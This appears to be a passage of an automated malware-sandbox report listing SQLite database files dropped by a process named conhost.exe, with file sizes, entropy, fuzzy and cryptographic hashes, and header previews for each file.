                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
